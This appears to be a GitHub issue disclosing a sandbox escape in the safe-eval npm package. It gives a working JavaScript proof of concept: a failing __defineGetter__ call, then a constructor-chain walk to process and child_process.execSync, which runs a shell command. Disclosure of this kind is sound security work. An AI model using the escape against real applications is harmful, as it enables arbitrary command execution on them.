Open seongil-wi opened 1 year ago
```js
// node version: 19.8.1
// safe-eval version: 0.4.1
var safeEval = require('safe-eval')

let code = `
(function() {
  try {
    __defineGetter__("x", );
  } catch (ret) {
    ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
  }
})()
`

safeEval(code);
```
The sandbox can be escaped by prototype pollution by calling the `__defineGetter__` function. Also, we can execute arbitrary shell code using the `process` module.